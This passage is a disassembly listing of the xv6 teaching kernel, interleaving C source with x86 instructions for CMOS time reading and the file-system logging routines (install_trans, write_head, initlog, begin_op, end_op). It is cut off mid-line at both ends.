03 00 00 mov %ecx,0x300(%eax) lapic[ID]; // wait for write to finish, by reading 801027c7: 8b 40 20 mov 0x20(%eax),%eax for(i = 0; i < 2; i++){ lapicw(ICRHI, apicid<<24); lapicw(ICRLO, STARTUP | (addr>>12)); microdelay(200); } } 801027ca: 5b pop %ebx 801027cb: 5d pop %ebp 801027cc: c3 ret 801027cd: 8d 76 00 lea 0x0(%esi),%esi 801027d0 <cmostime>: r->year = cmos_read(YEAR); } // qemu seems to use 24-hour GWT and the values are BCD encoded void cmostime(struct rtcdate *r) { 801027d0: 55 push %ebp 801027d1: ba 70 00 00 00 mov $0x70,%edx 801027d6: b8 0b 00 00 00 mov $0xb,%eax 801027db: 89 e5 mov %esp,%ebp 801027dd: 57 push %edi 801027de: 56 push %esi 801027df: 53 push %ebx 801027e0: 83 ec 4c sub $0x4c,%esp 801027e3: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 801027e4: ba 71 00 00 00 mov $0x71,%edx 801027e9: ec in (%dx),%al 801027ea: 83 e0 04 and $0x4,%eax 801027ed: 8d 75 d0 lea -0x30(%ebp),%esi } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 801027f0: 31 db xor %ebx,%ebx 801027f2: 88 45 b7 mov %al,-0x49(%ebp) 801027f5: bf 70 00 00 00 mov $0x70,%edi 801027fa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80102800: 89 d8 mov %ebx,%eax 80102802: 89 fa mov %edi,%edx 80102804: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80102805: b9 71 00 00 00 mov $0x71,%ecx 8010280a: 89 ca mov %ecx,%edx 8010280c: ec in (%dx),%al return inb(CMOS_RETURN); } static void fill_rtcdate(struct rtcdate *r) { r->second = cmos_read(SECS); 8010280d: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102810: 89 fa mov %edi,%edx 80102812: 89 45 b8 mov %eax,-0x48(%ebp) 80102815: b8 02 00 00 00 mov $0x2,%eax 8010281a: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010281b: 89 ca mov %ecx,%edx 8010281d: ec in (%dx),%al r->minute = cmos_read(MINS); 8010281e: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102821: 89 fa mov %edi,%edx 80102823: 89 45 bc mov %eax,-0x44(%ebp) 80102826: b8 04 00 00 00 mov $0x4,%eax 8010282b: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010282c: 89 ca mov %ecx,%edx 8010282e: ec in (%dx),%al r->hour = cmos_read(HOURS); 8010282f: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102832: 89 fa mov %edi,%edx 80102834: 89 45 c0 mov %eax,-0x40(%ebp) 80102837: b8 07 00 00 00 mov $0x7,%eax 8010283c: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010283d: 89 ca mov %ecx,%edx 8010283f: ec in (%dx),%al r->day = cmos_read(DAY); 80102840: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102843: 89 fa mov %edi,%edx 80102845: 89 45 c4 mov %eax,-0x3c(%ebp) 80102848: b8 08 00 00 00 mov $0x8,%eax 8010284d: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010284e: 89 ca mov %ecx,%edx 80102850: ec in (%dx),%al r->month = cmos_read(MONTH); 80102851: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102854: 89 fa mov %edi,%edx 80102856: 89 45 c8 mov %eax,-0x38(%ebp) 80102859: b8 09 00 00 00 mov $0x9,%eax 8010285e: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010285f: 89 ca mov %ecx,%edx 80102861: ec in (%dx),%al r->year = cmos_read(YEAR); 80102862: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102865: 89 fa mov %edi,%edx 80102867: 89 45 cc mov %eax,-0x34(%ebp) 8010286a: b8 0a 00 00 00 mov $0xa,%eax 8010286f: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80102870: 89 ca mov %ecx,%edx 80102872: ec in (%dx),%al bcd = (sb & (1 << 2)) == 0; // make sure CMOS doesn't modify time while we read it for(;;) { fill_rtcdate(&t1); if(cmos_read(CMOS_STATA) & CMOS_UIP) 80102873: 84 c0 test %al,%al 80102875: 78 89 js 80102800 <cmostime+0x30> } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102877: 89 d8 mov %ebx,%eax 80102879: 89 fa mov %edi,%edx 8010287b: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010287c: 89 ca mov %ecx,%edx 8010287e: ec in (%dx),%al return inb(CMOS_RETURN); } static void fill_rtcdate(struct rtcdate *r) { r->second = cmos_read(SECS); 8010287f: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102882: 89 fa mov %edi,%edx 80102884: 89 45 d0 mov %eax,-0x30(%ebp) 80102887: b8 02 00 00 00 mov $0x2,%eax 8010288c: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010288d: 89 ca mov %ecx,%edx 8010288f: ec in (%dx),%al r->minute = cmos_read(MINS); 80102890: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102893: 89 fa mov %edi,%edx 80102895: 89 45 d4 mov %eax,-0x2c(%ebp) 80102898: b8 04 00 00 00 mov $0x4,%eax 8010289d: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 8010289e: 89 ca mov %ecx,%edx 801028a0: ec in (%dx),%al r->hour = cmos_read(HOURS); 801028a1: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 801028a4: 89 fa mov %edi,%edx 801028a6: 89 45 d8 mov %eax,-0x28(%ebp) 801028a9: b8 07 00 00 00 mov $0x7,%eax 801028ae: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 801028af: 89 ca mov %ecx,%edx 801028b1: ec in (%dx),%al r->day = cmos_read(DAY); 801028b2: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 801028b5: 89 fa mov %edi,%edx 801028b7: 89 45 dc mov %eax,-0x24(%ebp) 801028ba: b8 08 00 00 00 mov $0x8,%eax 801028bf: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 801028c0: 89 ca mov %ecx,%edx 801028c2: ec in (%dx),%al r->month = cmos_read(MONTH); 801028c3: 0f b6 c0 movzbl %al,%eax } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 801028c6: 89 fa mov %edi,%edx 801028c8: 89 45 e0 mov %eax,-0x20(%ebp) 801028cb: b8 09 00 00 00 mov $0x9,%eax 801028d0: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 801028d1: 89 ca mov %ecx,%edx 801028d3: ec in (%dx),%al r->year = cmos_read(YEAR); 801028d4: 0f b6 c0 movzbl %al,%eax for(;;) { fill_rtcdate(&t1); if(cmos_read(CMOS_STATA) & CMOS_UIP) continue; fill_rtcdate(&t2); if(memcmp(&t1, &t2, sizeof(t1)) == 0) 801028d7: 83 ec 04 sub $0x4,%esp r->second = cmos_read(SECS); r->minute = cmos_read(MINS); r->hour = cmos_read(HOURS); r->day = cmos_read(DAY); r->month = cmos_read(MONTH); r->year = cmos_read(YEAR); 801028da: 89 45 e4 mov %eax,-0x1c(%ebp) for(;;) { fill_rtcdate(&t1); if(cmos_read(CMOS_STATA) & CMOS_UIP) continue; fill_rtcdate(&t2); if(memcmp(&t1, &t2, sizeof(t1)) == 0) 801028dd: 8d 45 b8 lea -0x48(%ebp),%eax 801028e0: 6a 18 push $0x18 801028e2: 56 push %esi 801028e3: 50 push %eax 801028e4: e8 f7 1d 00 00 call 801046e0 <memcmp> 801028e9: 83 c4 10 add $0x10,%esp 801028ec: 85 c0 test %eax,%eax 801028ee: 0f 85 0c ff ff ff jne 80102800 <cmostime+0x30> break; } // convert if(bcd) { 801028f4: 80 7d b7 00 cmpb $0x0,-0x49(%ebp) 801028f8: 75 78 jne 80102972 <cmostime+0x1a2> #define CONV(x) (t1.x = ((t1.x >> 4) * 10) + (t1.x & 0xf)) CONV(second); 801028fa: 8b 45 b8 mov -0x48(%ebp),%eax 801028fd: 89 c2 mov %eax,%edx 801028ff: 83 e0 0f and $0xf,%eax 80102902: c1 ea 04 shr $0x4,%edx 80102905: 8d 14 92 lea (%edx,%edx,4),%edx 80102908: 8d 04 50 lea (%eax,%edx,2),%eax 8010290b: 89 45 b8 mov %eax,-0x48(%ebp) CONV(minute); 8010290e: 8b 45 bc mov -0x44(%ebp),%eax 80102911: 89 c2 mov %eax,%edx 80102913: 83 e0 0f and $0xf,%eax 80102916: c1 ea 04 shr $0x4,%edx 80102919: 8d 14 92 lea (%edx,%edx,4),%edx 8010291c: 8d 04 50 lea (%eax,%edx,2),%eax 8010291f: 89 45 bc mov %eax,-0x44(%ebp) CONV(hour ); 80102922: 8b 45 c0 mov -0x40(%ebp),%eax 80102925: 89 c2 mov %eax,%edx 80102927: 83 e0 0f and $0xf,%eax 8010292a: c1 ea 04 shr $0x4,%edx 8010292d: 8d 14 92 lea (%edx,%edx,4),%edx 80102930: 8d 04 50 lea (%eax,%edx,2),%eax 80102933: 89 45 c0 mov %eax,-0x40(%ebp) CONV(day ); 80102936: 8b 45 c4 mov -0x3c(%ebp),%eax 80102939: 89 c2 mov %eax,%edx 8010293b: 83 e0 0f and $0xf,%eax 8010293e: c1 ea 04 shr $0x4,%edx 80102941: 8d 14 92 lea (%edx,%edx,4),%edx 80102944: 8d 04 50 lea (%eax,%edx,2),%eax 80102947: 89 45 c4 mov %eax,-0x3c(%ebp) CONV(month ); 8010294a: 8b 45 c8 mov -0x38(%ebp),%eax 8010294d: 89 c2 mov %eax,%edx 8010294f: 83 e0 0f and $0xf,%eax 80102952: c1 ea 04 shr $0x4,%edx 80102955: 8d 14 92 lea (%edx,%edx,4),%edx 80102958: 8d 04 50 lea (%eax,%edx,2),%eax 8010295b: 89 45 c8 mov %eax,-0x38(%ebp) CONV(year ); 8010295e: 8b 45 cc mov -0x34(%ebp),%eax 80102961: 89 c2 mov %eax,%edx 80102963: 83 e0 0f and $0xf,%eax 80102966: c1 ea 04 shr $0x4,%edx 80102969: 8d 14 92 lea (%edx,%edx,4),%edx 8010296c: 8d 04 50 lea (%eax,%edx,2),%eax 8010296f: 89 45 cc mov %eax,-0x34(%ebp) #undef CONV } *r = t1; 80102972: 8b 75 08 mov 0x8(%ebp),%esi 80102975: 8b 45 b8 mov -0x48(%ebp),%eax 80102978: 89 06 mov %eax,(%esi) 8010297a: 8b 45 bc mov -0x44(%ebp),%eax 8010297d: 89 46 04 mov %eax,0x4(%esi) 80102980: 8b 45 c0 mov -0x40(%ebp),%eax 80102983: 89 46 08 mov %eax,0x8(%esi) 80102986: 8b 45 c4 mov -0x3c(%ebp),%eax 80102989: 89 46 0c mov %eax,0xc(%esi) 8010298c: 8b 45 c8 mov -0x38(%ebp),%eax 8010298f: 89 46 10 mov %eax,0x10(%esi) 80102992: 8b 45 cc mov -0x34(%ebp),%eax 80102995: 89 46 14 mov %eax,0x14(%esi) r->year += 2000; 80102998: 81 46 14 d0 07 00 00 addl $0x7d0,0x14(%esi) } 8010299f: 8d 65 f4 lea -0xc(%ebp),%esp 801029a2: 5b pop %ebx 801029a3: 5e pop %esi 801029a4: 5f pop %edi 801029a5: 5d pop %ebp 801029a6: c3 ret 801029a7: 66 90 xchg %ax,%ax 801029a9: 66 90 xchg %ax,%ax 801029ab: 66 90 xchg %ax,%ax 801029ad: 66 90 xchg %ax,%ax 801029af: 90 nop 801029b0 <install_trans>: static void install_trans(void) { int tail; for (tail = 0; tail < log.lh.n; tail++) { 801029b0: 8b 0d e8 26 11 80 mov 0x801126e8,%ecx 801029b6: 85 c9 test %ecx,%ecx 801029b8: 0f 8e 85 00 00 00 jle 80102a43 <install_trans+0x93> } // Copy committed blocks from log to their home location static void install_trans(void) { 801029be: 55 push %ebp 801029bf: 89 e5 mov %esp,%ebp 801029c1: 57 push %edi 801029c2: 56 push %esi 801029c3: 53 push %ebx 801029c4: 31 db xor %ebx,%ebx 801029c6: 83 ec 0c sub $0xc,%esp 801029c9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi int tail; for (tail = 0; tail < log.lh.n; tail++) { struct buf *lbuf = bread(log.dev, log.start+tail+1); // read log block 801029d0: a1 d4 26 11 80 mov 0x801126d4,%eax 801029d5: 83 ec 08 sub $0x8,%esp 801029d8: 01 d8 add %ebx,%eax 801029da: 83 c0 01 add $0x1,%eax 801029dd: 50 push %eax 801029de: ff 35 e4 26 11 80 pushl 0x801126e4 801029e4: e8 e7 d6 ff ff call 801000d0 <bread> 801029e9: 89 c7 mov %eax,%edi struct buf *dbuf = bread(log.dev, log.lh.block[tail]); // read dst 801029eb: 58 pop %eax 801029ec: 5a pop %edx 801029ed: ff 34 9d ec 26 11 80 pushl -0x7feed914(,%ebx,4) 801029f4: ff 35 e4 26 11 80 pushl 0x801126e4 static void install_trans(void) { int tail; for (tail = 0; tail < log.lh.n; tail++) { 801029fa: 83 c3 01 add $0x1,%ebx struct buf *lbuf = bread(log.dev, log.start+tail+1); // read log block struct buf *dbuf = bread(log.dev, log.lh.block[tail]); // read dst 801029fd: e8 ce d6 ff ff call 801000d0 <bread> 80102a02: 89 c6 mov %eax,%esi memmove(dbuf->data, lbuf->data, BSIZE); // copy block to dst 80102a04: 8d 47 5c lea 0x5c(%edi),%eax 80102a07: 83 c4 0c add $0xc,%esp 80102a0a: 68 00 02 00 00 push $0x200 80102a0f: 50 push %eax 80102a10: 8d 46 5c lea 0x5c(%esi),%eax 80102a13: 50 push %eax 80102a14: e8 27 1d 00 00 call 80104740 <memmove> bwrite(dbuf); // write dst to disk 80102a19: 89 34 24 mov %esi,(%esp) 80102a1c: e8 7f d7 ff ff call 801001a0 <bwrite> brelse(lbuf); 80102a21: 89 3c 24 mov %edi,(%esp) 80102a24: e8 b7 d7 ff ff call 801001e0 <brelse> brelse(dbuf); 80102a29: 89 34 24 mov %esi,(%esp) 80102a2c: e8 af d7 ff ff call 801001e0 <brelse> static void install_trans(void) { int tail; for (tail = 0; tail < log.lh.n; tail++) { 80102a31: 83 c4 10 add $0x10,%esp 80102a34: 39 1d e8 26 11 80 cmp %ebx,0x801126e8 80102a3a: 7f 94 jg 801029d0 <install_trans+0x20> memmove(dbuf->data, lbuf->data, BSIZE); // copy block to dst bwrite(dbuf); // write dst to disk brelse(lbuf); brelse(dbuf); } } 80102a3c: 8d 65 f4 lea -0xc(%ebp),%esp 80102a3f: 5b pop %ebx 80102a40: 5e pop %esi 80102a41: 5f pop %edi 80102a42: 5d pop %ebp 80102a43: f3 c3 repz ret 80102a45: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80102a49: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80102a50 <write_head>: // Write in-memory log header to disk. // This is the true point at which the // current transaction commits. static void write_head(void) { 80102a50: 55 push %ebp 80102a51: 89 e5 mov %esp,%ebp 80102a53: 53 push %ebx 80102a54: 83 ec 0c sub $0xc,%esp struct buf *buf = bread(log.dev, log.start); 80102a57: ff 35 d4 26 11 80 pushl 0x801126d4 80102a5d: ff 35 e4 26 11 80 pushl 0x801126e4 80102a63: e8 68 d6 ff ff call 801000d0 <bread> struct logheader *hb = (struct logheader *) (buf->data); int i; hb->n = log.lh.n; 80102a68: 8b 0d e8 26 11 80 mov 0x801126e8,%ecx for (i = 0; i < log.lh.n; i++) { 80102a6e: 83 c4 10 add $0x10,%esp // This is the true point at which the // current transaction commits. static void write_head(void) { struct buf *buf = bread(log.dev, log.start); 80102a71: 89 c3 mov %eax,%ebx struct logheader *hb = (struct logheader *) (buf->data); int i; hb->n = log.lh.n; for (i = 0; i < log.lh.n; i++) { 80102a73: 85 c9 test %ecx,%ecx write_head(void) { struct buf *buf = bread(log.dev, log.start); struct logheader *hb = (struct logheader *) (buf->data); int i; hb->n = log.lh.n; 80102a75: 89 48 5c mov %ecx,0x5c(%eax) for (i = 0; i < log.lh.n; i++) { 80102a78: 7e 1f jle 80102a99 <write_head+0x49> 80102a7a: 8d 04 8d 00 00 00 00 lea 0x0(,%ecx,4),%eax 80102a81: 31 d2 xor %edx,%edx 80102a83: 90 nop 80102a84: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi hb->block[i] = log.lh.block[i]; 80102a88: 8b 8a ec 26 11 80 mov -0x7feed914(%edx),%ecx 80102a8e: 89 4c 13 60 mov %ecx,0x60(%ebx,%edx,1) 80102a92: 83 c2 04 add $0x4,%edx { struct buf *buf = bread(log.dev, log.start); struct logheader *hb = (struct logheader *) (buf->data); int i; hb->n = log.lh.n; for (i = 0; i < log.lh.n; i++) { 80102a95: 39 c2 cmp %eax,%edx 80102a97: 75 ef jne 80102a88 <write_head+0x38> hb->block[i] = log.lh.block[i]; } bwrite(buf); 80102a99: 83 ec 0c sub $0xc,%esp 80102a9c: 53 push %ebx 80102a9d: e8 fe d6 ff ff call 801001a0 <bwrite> brelse(buf); 80102aa2: 89 1c 24 mov %ebx,(%esp) 80102aa5: e8 36 d7 ff ff call 801001e0 <brelse> } 80102aaa: 8b 5d fc mov -0x4(%ebp),%ebx 80102aad: c9 leave 80102aae: c3 ret 80102aaf: 90 nop 80102ab0 <initlog>: static void recover_from_log(void); static void commit(); void initlog(int dev) { 80102ab0: 55 push %ebp 80102ab1: 89 e5 mov %esp,%ebp 80102ab3: 53 push %ebx 80102ab4: 83 ec 2c sub $0x2c,%esp 80102ab7: 8b 5d 08 mov 0x8(%ebp),%ebx if (sizeof(struct logheader) >= BSIZE) panic("initlog: too big logheader"); struct superblock sb; initlock(&log.lock, "log"); 80102aba: 68 40 76 10 80 push $0x80107640 80102abf: 68 a0 26 11 80 push $0x801126a0 80102ac4: e8 57 19 00 00 call 80104420 <initlock> readsb(dev, &sb); 80102ac9: 58 pop %eax 80102aca: 8d 45 dc lea -0x24(%ebp),%eax 80102acd: 5a pop %edx 80102ace: 50 push %eax 80102acf: 53 push %ebx 80102ad0: e8 db e8 ff ff call 801013b0 <readsb> log.start = sb.logstart; log.size = sb.nlog; 80102ad5: 8b 55 e8 mov -0x18(%ebp),%edx panic("initlog: too big logheader"); struct superblock sb; initlock(&log.lock, "log"); readsb(dev, &sb); log.start = sb.logstart; 80102ad8: 8b 45 ec mov -0x14(%ebp),%eax // Read the log header from disk into the in-memory log header static void read_head(void) { struct buf *buf = bread(log.dev, log.start); 80102adb: 59 pop %ecx struct superblock sb; initlock(&log.lock, "log"); readsb(dev, &sb); log.start = sb.logstart; log.size = sb.nlog; log.dev = dev; 80102adc: 89 1d e4 26 11 80 mov %ebx,0x801126e4 struct superblock sb; initlock(&log.lock, "log"); readsb(dev, &sb); log.start = sb.logstart; log.size = sb.nlog; 80102ae2: 89 15 d8 26 11 80 mov %edx,0x801126d8 panic("initlog: too big logheader"); struct superblock sb; initlock(&log.lock, "log"); readsb(dev, &sb); log.start = sb.logstart; 80102ae8: a3 d4 26 11 80 mov %eax,0x801126d4 // Read the log header from disk into the in-memory log header static void read_head(void) { struct buf *buf = bread(log.dev, log.start); 80102aed: 5a pop %edx 80102aee: 50 push %eax 80102aef: 53 push %ebx 80102af0: e8 db d5 ff ff call 801000d0 <bread> struct logheader *lh = (struct logheader *) (buf->data); int i; log.lh.n = lh->n; 80102af5: 8b 48 5c mov 0x5c(%eax),%ecx for (i = 0; i < log.lh.n; i++) { 80102af8: 83 c4 10 add $0x10,%esp 80102afb: 85 c9 test %ecx,%ecx read_head(void) { struct buf *buf = bread(log.dev, log.start); struct logheader *lh = (struct logheader *) (buf->data); int i; log.lh.n = lh->n; 80102afd: 89 0d e8 26 11 80 mov %ecx,0x801126e8 for (i = 0; i < log.lh.n; i++) { 80102b03: 7e 1c jle 80102b21 <initlog+0x71> 80102b05: 8d 1c 8d 00 00 00 00 lea 0x0(,%ecx,4),%ebx 80102b0c: 31 d2 xor %edx,%edx 80102b0e: 66 90 xchg %ax,%ax log.lh.block[i] = lh->block[i]; 80102b10: 8b 4c 10 60 mov 0x60(%eax,%edx,1),%ecx 80102b14: 83 c2 04 add $0x4,%edx 80102b17: 89 8a e8 26 11 80 mov %ecx,-0x7feed918(%edx) { struct buf *buf = bread(log.dev, log.start); struct logheader *lh = (struct logheader *) (buf->data); int i; log.lh.n = lh->n; for (i = 0; i < log.lh.n; i++) { 80102b1d: 39 da cmp %ebx,%edx 80102b1f: 75 ef jne 80102b10 <initlog+0x60> log.lh.block[i] = lh->block[i]; } brelse(buf); 80102b21: 83 ec 0c sub $0xc,%esp 80102b24: 50 push %eax 80102b25: e8 b6 d6 ff ff call 801001e0 <brelse> static void recover_from_log(void) { read_head(); install_trans(); // if committed, copy from log to disk 80102b2a: e8 81 fe ff ff call 801029b0 <install_trans> log.lh.n = 0; 80102b2f: c7 05 e8 26 11 80 00 movl $0x0,0x801126e8 80102b36: 00 00 00 write_head(); // clear the log 80102b39: e8 12 ff ff ff call 80102a50 <write_head> readsb(dev, &sb); log.start = sb.logstart; log.size = sb.nlog; log.dev = dev; recover_from_log(); } 80102b3e: 8b 5d fc mov -0x4(%ebp),%ebx 80102b41: c9 leave 80102b42: c3 ret 80102b43: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80102b49: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80102b50 <begin_op>: } // called at the start of each FS system call. void begin_op(void) { 80102b50: 55 push %ebp 80102b51: 89 e5 mov %esp,%ebp 80102b53: 83 ec 14 sub $0x14,%esp acquire(&log.lock); 80102b56: 68 a0 26 11 80 push $0x801126a0 80102b5b: e8 c0 19 00 00 call 80104520 <acquire> 80102b60: 83 c4 10 add $0x10,%esp 80102b63: eb 18 jmp 80102b7d <begin_op+0x2d> 80102b65: 8d 76 00 lea 0x0(%esi),%esi while(1){ if(log.committing){ sleep(&log, &log.lock); 80102b68: 83 ec 08 sub $0x8,%esp 80102b6b: 68 a0 26 11 80 push $0x801126a0 80102b70: 68 a0 26 11 80 push $0x801126a0 80102b75: e8 b6 11 00 00 call 80103d30 <sleep> 80102b7a: 83 c4 10 add $0x10,%esp void begin_op(void) { acquire(&log.lock); while(1){ if(log.committing){ 80102b7d: a1 e0 26 11 80 mov 0x801126e0,%eax 80102b82: 85 c0 test %eax,%eax 80102b84: 75 e2 jne 80102b68 <begin_op+0x18> sleep(&log, &log.lock); } else if(log.lh.n + (log.outstanding+1)*MAXOPBLOCKS > LOGSIZE){ 80102b86: a1 dc 26 11 80 mov 0x801126dc,%eax 80102b8b: 8b 15 e8 26 11 80 mov 0x801126e8,%edx 80102b91: 83 c0 01 add $0x1,%eax 80102b94: 8d 0c 80 lea (%eax,%eax,4),%ecx 80102b97: 8d 14 4a lea (%edx,%ecx,2),%edx 80102b9a: 83 fa 1e cmp $0x1e,%edx 80102b9d: 7f c9 jg 80102b68 <begin_op+0x18> // this op might exhaust log space; wait for commit. sleep(&log, &log.lock); } else { log.outstanding += 1; release(&log.lock); 80102b9f: 83 ec 0c sub $0xc,%esp sleep(&log, &log.lock); } else if(log.lh.n + (log.outstanding+1)*MAXOPBLOCKS > LOGSIZE){ // this op might exhaust log space; wait for commit. sleep(&log, &log.lock); } else { log.outstanding += 1; 80102ba2: a3 dc 26 11 80 mov %eax,0x801126dc release(&log.lock); 80102ba7: 68 a0 26 11 80 push $0x801126a0 80102bac: e8 8f 1a 00 00 call 80104640 <release> break; } } } 80102bb1: 83 c4 10 add $0x10,%esp 80102bb4: c9 leave 80102bb5: c3 ret 80102bb6: 8d 76 00 lea 0x0(%esi),%esi 80102bb9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80102bc0 <end_op>: // called at the end of each FS system call. // commits if this was the last outstanding operation. void end_op(void) { 80102bc0: 55 push %ebp 80102bc1: 89 e5 mov %esp,%ebp 80102bc3: 57 push %edi 80102bc4: 56 push %esi 80102bc5: 53 push %ebx 80102bc6: 83 ec 18 sub $0x18,%esp int do_commit = 0; acquire(&log.lock); 80102bc9: 68 a0 26 11 80 push $0x801126a0 80102bce: e8 4d 19 00 00 call 80104520 <acquire> log.outstanding -= 1; 80102bd3: a1 dc 26 11 80 mov 0x801126dc,%eax if(log.committing) 80102bd8: 8b 1d e0 26 11 80 mov 0x801126e0,%ebx 80102bde: 83 c4 10 add $0x10,%esp end_op(void) { int do_commit = 0; acquire(&log.lock); log.outstanding -= 1; 80102be1: 83 e8 01 sub $0x1,%eax if(log.committing) 80102be4: 85 db test %ebx,%ebx end_op(void) { int do_commit = 0; acquire(&log.lock); log.outstanding -= 1; 80102be6: a3 dc 26 11 80 mov %eax,0x801126dc if(log.committing) 80102beb: 0f 85 23 01 00 00 jne 80102d14 <end_op+0x154> panic("log.committing"); if(log.outstanding == 0){ 80102bf1: 85 c0 test %eax,%eax 80102bf3: 0f 85 f7 00 00 00 jne 80102cf0 <end_op+0x130> // begin_op() may be waiting for log space, // and decrementing log.outstanding has decreased // the amount of reserved space. wakeup(&log); } release(&log.lock); 80102bf9: 83 ec 0c sub $0xc,%esp log.outstanding -= 1; if(log.committing) panic("log.committing"); if(log.outstanding == 0){ do_commit = 1; log.committing = 1; 80102bfc: c7 05 e0 26 11 80 01 movl $0x1,0x801126e0 80102c03: 00 00 00 } static void commit() { if (log.lh.n > 0) { 80102c06: 31 db xor %ebx,%ebx // begin_op() may be waiting for log space, // and decrementing log.outstanding has decreased // the amount of reserved space. wakeup(&log); } release(&log.lock); 80102c08: 68 a0 26 11 80 push $0x801126a0 80102c0d: e8 2e 1a 00 00 call 80104640 <release> } static void commit() { if (log.lh.n > 0) { 80102c12: 8b 0d e8 26 11 80 mov 0x801126e8,%ecx 80102c18: 83 c4 10 add $0x10,%esp 80102c1b: 85 c9 test %ecx,%ecx 80102c1d: 0f 8e 8a 00 00 00 jle 80102cad <end_op+0xed> 80102c23: 90 nop 80102c24: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi write_log(void) { int tail; for (tail = 0; tail < log.lh.n; tail++) { struct buf *to = bread(log.dev, log.start+tail+1); // log block 80102c28: a1 d4 26 11 80 mov 0x801126d4,%eax 80102c2d: 83 ec 08 sub $0x8,%esp 80102c30: 01 d8 add %ebx,%eax 80102c32: 83 c0 01 add $0x1,%eax 80102c35: 50 push %eax 80102c36: ff 35 e4 26 11 80 pushl 0x801126e4 80102c3c: e8 8f d4 ff ff call 801000d0 <bread> 80102c41: 89 c6 mov %eax,%esi struct buf *from = bread(log.dev, log.lh.block[tail]); // cache block 80102c43: 58 pop %eax 80102c44: 5a pop %edx 80102c45: ff 34 9d ec 26 11 80 pushl -0x7feed914(,%ebx,4) 80102c4c: ff 35 e4 26 11 80 pushl 0x801126e4 static void write_log(void) { int tail; for (tail = 0; tail < log.lh.n; tail++) { 80102c52: 83 c3 01 add $0x1,%ebx struct buf *to = bread(log.dev, log.start+tail+1); // log block struct buf *from = bread(log.dev, log.lh.block[tail]); // cache block 80102c55: e8 76 d4 ff ff call 801000d0 <bread> 80102c5a: 89 c7 mov %eax,%edi memmove(to->data, from->data, BSIZE); 80102c5c: 8d 40 5c lea 0x5c(%eax),%eax 80102c5f: 83 c4 0c add $0xc,%esp 80102c62: 68 00 02 00 00 push $0x200 80102c67: 50 push %eax 80102c68: 8d 46 5c lea 0x5c(%esi),%eax 80102c6b: 50 push %eax 80102c6c: e8 cf 1a 00 00 call 80104740 <memmove> bwrite(to); // write the log 80102c71: 89 34 24 mov %esi,(%esp) 80102c74: e8 27 d5 ff ff call 801001a0 <bwrite> brelse(from); 80102c79: 89 3c 24 mov %edi,(%esp) 80102c7c: e8 5f d5 ff ff call 801001e0 <brelse> brelse(to); 80102c81: 89 34 24 mov %esi,(%esp) 80102c84: e8 57 d5 ff ff call 801001e0 <brelse> static void write_log(void) { int tail; for (tail = 0; tail < log.lh.n; tail++) { 80102c89: 83 c4 10 add $0x10,%esp 80102c8c: 3b 1d e8 26 11 80 cmp 0x801126e8,%ebx 80102c92: 7c 94 jl 80102c28 <end_op+0x68> static void commit() { if (log.lh.n > 0) { write_log(); // Write modified blocks from cache to 